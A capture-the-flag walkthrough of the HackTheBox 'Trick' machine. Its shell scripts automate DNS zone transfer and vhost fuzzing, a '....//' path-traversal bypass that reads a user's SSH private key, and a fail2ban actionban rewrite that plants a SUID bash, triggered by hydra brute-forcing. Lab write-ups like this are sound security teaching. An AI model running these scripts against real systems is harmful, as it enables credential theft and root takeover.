# Trick

## Gaining Access

Nmap scan:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-087c1c6a327f1290af48bc672e0baae2f95d16f2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

We can add `trick.htb` to `/etc/hosts`, as is usual for HTB boxes.

### DNS Fuzzing

None of the ports yielded anything of interest, and port 80 was just a corporate website with nothing to interact with. However, since the box runs its own nameserver, I attempted a zone transfer (AXFR) against it, and that gave up another hostname:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4838c87cf5bfd4b4c4bcdc109d5c1f5f94764aae%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

The `preprod-payroll` subdomain was new, so I added it to `/etc/hosts` as well and headed there.

### Payroll Rabbit Hole

The page hosted an application for tracking employee salaries.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-eee19351640ba0da76ffad118961f92df42654d0%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Initially, I assumed that there would be some kind of public exploit for this Employee Record system, and found quite a few.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-b15cc409dc6ec27dc28d03aeaf5ce0976fa42705%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

However, none of the exploits worked here and I was stuck.

### Subdomain Fuzzing

The whole payroll application was a rabbit hole, and I could not make anything work, so I went back to fuzzing subdomains, which at first found nothing.

I then fuzzed again with `preprod-` prefixed to every word in the list (matching the naming of the subdomain the zone transfer gave up), and found a new virtual host:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-8bbc4c5e80fbee273eab445fa61305c528fd15a3%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
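The two enumeration steps that found the hidden hosts, the zone transfer and the prefixed virtual-host fuzzing, as one added shell example. This is not the write-up's own command history: `trick.htb` and the `preprod-` prefix come from the write-up, while `TARGET` (the box IP), the `WORDLIST` path, and the `SAMPLE_AXFR` dig output are assumptions or constructed stand-ins. The vhost function does by hand what `ffuf -H 'Host: preprod-FUZZ.trick.htb' -fs <baseline size>` does: send each candidate as the `Host` header and keep the ones whose response differs from a nonexistent host.

```shell
#!/bin/sh
# Added example, not from the write-up. TARGET (box IP) and WORDLIST are
# assumptions; SAMPLE_AXFR is constructed so the parser can run offline.

# 1. Zone transfer: the box answers DNS itself, so ask it for the whole
#    trick.htb zone (same as: dig axfr trick.htb @$TARGET).
axfr_hosts() {   # axfr_hosts <domain> <nameserver>
    dig axfr "$1" @"$2" +noall +answer | parse_axfr
}

# Pull unique hostnames out of dig's record lines ("name ttl IN TYPE rdata").
# A and CNAME owners are kept, the trailing dot dropped, ";" comments skipped.
parse_axfr() {
    awk '/^;/ { next }
         $3 == "IN" && ($4 == "A" || $4 == "CNAME") { sub(/\.$/, "", $1); print $1 }' \
    | sort -u
}

# Constructed stand-in for dig's answer section (not real output from the box).
SAMPLE_AXFR='trick.htb.                 604800 IN SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.                 604800 IN NS    trick.htb.
trick.htb.                 604800 IN A     127.0.0.1
preprod-payroll.trick.htb. 604800 IN A     127.0.0.1'

# 2. Build prefixed candidates: "<prefix><word>.<domain>", words on stdin.
prefixed_candidates() {   # prefixed_candidates <prefix> <domain>
    while IFS= read -r pc_word; do
        if [ -n "$pc_word" ]; then
            printf '%s%s.%s\n' "$1" "$pc_word" "$2"
        fi
    done
}

# 3. Response size for a given Host header against the box's web server.
body_size() {   # body_size <ip> <host header>
    curl -s -o /dev/null -w '%{size_download}' -H "Host: $2" "http://$1/"
}

# Report candidates whose response size differs from a bogus host
# (the catch-all site). A different size means a separate vhost.
vhost_fuzz() {   # vhost_fuzz <ip> <prefix> <domain> <wordlist>
    vf_base=$(body_size "$1" "does-not-exist-$$.$3")
    prefixed_candidates "$2" "$3" < "$4" | while IFS= read -r vf_host; do
        vf_size=$(body_size "$1" "$vf_host")
        if [ "$vf_size" != "$vf_base" ]; then
            echo "$vf_host  ($vf_size bytes, baseline $vf_base)"
        fi
    done
}

# Stand-alone run against the box: RUN_EXAMPLE=1 TARGET=<ip> sh enum.sh
if [ -n "${RUN_EXAMPLE:-}" ]; then
    echo "[*] zone transfer:"
    axfr_hosts trick.htb "${TARGET:?set TARGET to the box IP}"
    echo "[*] prefixed vhost fuzzing:"
    vhost_fuzz "$TARGET" preprod- trick.htb \
        "${WORDLIST:-/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt}"
fi
```

Filtering on size alone is the same shortcut ffuf's `-fs` takes; if the catch-all page embeds something variable, compare status code or a hash of the body instead.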

### LFI for SSH Keys

The new site contained nothing of use in itself, but clicking through its tabs shows a `page` parameter in the URL.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-de91779fdc992bd8d503212333034ce9ed21416b%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

This is a candidate for directory traversal. The plain `../../../` payload did not work, but `....//....//....//` did. That is the signature of a filter that deletes `../` in a single pass: removing the `../` from the middle of `....//` leaves `../` behind, so the filtered path still climbs one directory per segment.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-5d5c1e98f43a4889f21c1aae68f47f8f7a947598%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
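A model of the filter bypass, as an added shell example rather than anything from the write-up or the target. `strip_once` is an assumed reconstruction of how the target's filter behaves (it is not the target's code), `strip_until_stable` and `page_allowed` are the defensive alternatives, and `lfi_read` takes the vulnerable URL as a placeholder argument. The traversal depth is a parameter because the real depth depends on where the web root sits.

```shell
#!/bin/sh
# Added example, not from the write-up. strip_once is an assumed model of
# the target's filter; the base URL passed to lfi_read is a placeholder.

# Vulnerable filter: every "../" is removed in a single pass. Applied to
# "....//", the middle "../" is removed and "../" is what remains.
strip_once() {
    printf '%s' "$1" | sed 's#\.\./##g'
}

# Same blocklist applied until nothing changes. Still a blocklist (it
# misses encodings such as %2e%2e/), but it shows why the bypass works.
strip_until_stable() {
    sus_cur=$1
    while :; do
        sus_next=$(printf '%s' "$sus_cur" | sed 's#\.\./##g')
        if [ "$sus_next" = "$sus_cur" ]; then break; fi
        sus_cur=$sus_next
    done
    printf '%s' "$sus_cur"
}

# Proper fix: allow-list the page name instead of sanitising a path.
page_allowed() {   # returns 0 only for names made of [A-Za-z0-9_-]
    case "$1" in
        '')               return 1 ;;
        *[!A-Za-z0-9_-]*) return 1 ;;
        *)                return 0 ;;
    esac
}

# Attacker side: a payload that survives a single-pass filter.
make_payload() {   # make_payload <depth> <file>
    mp_n=$1; mp_out=''
    while [ "$mp_n" -gt 0 ]; do
        mp_out="${mp_out}....//"
        mp_n=$((mp_n - 1))
    done
    printf '%s' "${mp_out}$2"
}

# Fetch a file through the vulnerable page parameter (needs the box).
# Example: lfi_read http://<vhost>/index.php 4 etc/passwd
lfi_read() {   # lfi_read <vulnerable url> <depth> <file>
    curl -s "$1?page=$(make_payload "$2" "$3")"
}
```

Start with `etc/passwd` at increasing depth until it renders, then reuse that depth for the SSH key.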

With this, I read the private SSH key of the user `michael` (reading `/etc/passwd` through the same traversal first shows which users have a home directory; the key sits at the usual `~/.ssh/id_rsa` path).

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-0d7e35e9b76165ea843ec7c837ef929d5742cb74%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Save the key locally, set its permissions to `600` (otherwise `ssh` refuses to use it), and SSH in as `michael` with `-i`.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-2b7306148730f36146ae6ce226eecf9316960ce9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Fail2ban

Enumerating the user's groups with `id` shows that `michael` is in the `security` group.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-bb766e5e048f1ae57d853798c057e94aa324d36c%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

`sudo -l` additionally shows that we may run `fail2ban restart` as root.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-b59d0353ebe4620edeed523348f1622ce4c3e5cd%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Fail2ban tails log files (for the `sshd` jail, the authentication log) and bans an IP address once it has caused a configured number of failures (`maxretry`). The ban is carried out by an action file; for the default `iptables-multiport` action that is `/etc/fail2ban/action.d/iptables-multiport.conf`, and its `actionban` line is the shell command fail2ban runs, as root, every time it bans an address.

On this machine our user can write to that configuration (confirm with `ls -ld /etc/fail2ban/action.d /etc/fail2ban/action.d/iptables-multiport.conf`). So we can replace the `actionban` command with one that gives us a reverse shell or creates a SUID binary, restart fail2ban through the `sudo` rule so the modified action is loaded, and then get **banned** on purpose: running `hydra` against SSH with a junk wordlist produces enough failed logins to trip the jail, at which point fail2ban executes our command as root.
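The escalation described above, as an added shell example; it is neither the write-up's commands nor the linked repository's script. Assumptions: the action directory (or file) is writable for our user, `actionban` is a single line as in the stock `iptables-multiport.conf`, the restart command is whatever `sudo -l` listed (written here as `/etc/init.d/fail2ban restart`, adjust to match), and `TARGET` is a placeholder for the box when running hydra from the attacking host. `write_sample_action` produces a constructed stand-in for the real action file so the editing logic can be tested offline.

```shell
#!/bin/sh
# Added example, not the write-up's or the linked repo's code. Run the
# planting steps on the box as michael; run trigger_ban from the attack
# host. Assumptions: ACTION_DIR writable by us, single-line actionban,
# restart command as listed by sudo -l, TARGET placeholder.

ACTION_DIR=${ACTION_DIR:-/etc/fail2ban/action.d}
ACTION_FILE=${ACTION_FILE:-iptables-multiport.conf}
PAYLOAD='cp /bin/bash /tmp/bash; chmod u+s /tmp/bash'   # avoid "&" and "|": sed specials

# Prerequisite: either the file or its directory must be writable.
# A writable directory is enough, because mv can replace a root-owned file.
check_writable() {   # check_writable <dir> <file>
    [ -w "$1/$2" ] || [ -w "$1" ]
}

current_actionban() {   # current_actionban <dir> <file>
    grep '^actionban' "$1/$2"
}

# Replace the command fail2ban runs (as root) each time it bans an IP.
plant_actionban() {   # plant_actionban <dir> <file> <shell command>
    pa_src="$1/$2"
    cp "$pa_src" "$pa_src.bak"                              # keep the original to restore
    sed "s|^actionban *=.*|actionban = $3|" "$pa_src" > "$pa_src.new"
    mv -f "$pa_src.new" "$pa_src"
}

# Constructed stand-in for the real action file, for offline testing only.
write_sample_action() {   # write_sample_action <dir> <file>
    cat > "$1/$2" <<'EOF'
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
EOF
}

# From the attack host: enough failed SSH logins to cross the jail's
# maxretry. The passwords are junk; only the failures matter.
trigger_ban() {   # trigger_ban <box ip> <user>
    printf 'a\nb\nc\nd\ne\nf\ng\nh\n' > /tmp/junk.txt
    hydra -l "$2" -P /tmp/junk.txt -t 4 "ssh://$1"
}

# On the box: RUN_EXAMPLE=1 sh f2b.sh
if [ -n "${RUN_EXAMPLE:-}" ]; then
    check_writable "$ACTION_DIR" "$ACTION_FILE" || { echo "action file not writable"; exit 1; }
    plant_actionban "$ACTION_DIR" "$ACTION_FILE" "$PAYLOAD"
    sudo /etc/init.d/fail2ban restart    # assumption: use the exact rule sudo -l shows
    echo "now run trigger_ban \$TARGET michael from the attack host, then: /tmp/bash -p"
fi
```

Two points worth knowing before running it: `bash -p` is required, since bash drops the effective UID without it; and because the replaced `actionban` no longer calls iptables, nothing is actually blocked, so the SSH session you planted from keeps working. Restore the `.bak` afterwards.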

This repo makes it easy to exploit:

{% embed url="https://github.com/rvizx/fail2ban/blob/main/fail2ban" %}

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-dec07eac2731f4be6ca49ca70696796a1736ae4a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-f03bf1997a1cc5c0742029e3ce9b644a9dc24ba2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Rooted.
